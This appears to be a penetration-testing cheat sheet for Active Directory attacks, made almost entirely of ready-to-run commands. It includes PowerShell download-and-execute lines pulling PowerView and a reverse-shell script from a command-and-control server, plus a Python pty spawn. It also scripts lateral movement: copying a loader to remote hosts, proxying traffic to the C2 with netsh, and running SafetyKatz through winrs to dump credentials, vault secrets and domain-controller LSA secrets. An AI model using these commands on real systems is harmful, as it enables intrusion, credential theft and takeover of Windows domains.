Menu
load
load-c2agent
load-powersploit
- discov/ad#load-powersploit
iex ($zc2srv_ip="") iex ((New-Object Net.WebClient).DownloadString("http://${zc2srv_ip}/PowerView.ps1"))
load-rshell
# python
python -c 'import pty; pty.spawn("/bin/bash")'
# powershell
powershell.exe iex (iwr http://${zc2srv_ip}/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress ${zc2srv_ip} -Port 443
load-rubeus
run
evasion-amsi
privesc
discov-ad-iter
creds-dump
pivot
loader-4-proxified-payload
#$zloader="Loader.exe"
#$zc2srv_ip="172.16.100.83"
#$zpayload="SafetyKatz.exe"
#$zpayload="PowerUp.ps1"
iwr http://${zc2srv_ip}/${zloader} -OutFile C:\User\Public\${zloader}
# $ztarg_computer_name=""
echo Y | xcopy C:\Users\Public\${zloader} \\${ztarg_computer_name}\C$\Users\Public\${zloader}
$null | winrs -r:${ztarg_computer_name} "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=${zc2srv_ip}"
$null | winrs -r:${ztarg_computer_name} "cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::evasive-keys exit"
$null | winrs -r:${ztarg_computer_name} 'cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe "token::elevate" "vault::cred /patch" "exit"'
# $ztarg_nexthop_name=""
echo Y | xcopy C:\Users\Public\${zloader} \\${ztarg_nexthop_name}\C$\Users\Public\${zloader}
$null | winrs -r:${ztarg_nexthop_name} "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=${zc2srv_ip}"
$null | winrs -r:${ztarg_nexthop_name} "cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::evasive-keys exit"
$null | winrs -r:${ztarg_nexthop_name} 'cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe "token::elevate" "vault::cred /patch" "exit"'
# $ztarg_computer_name IS a DC
$null | winrs -r:${ztarg_computer_name} 'cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe "lsadump::evasive-lsa /patch" "exit"'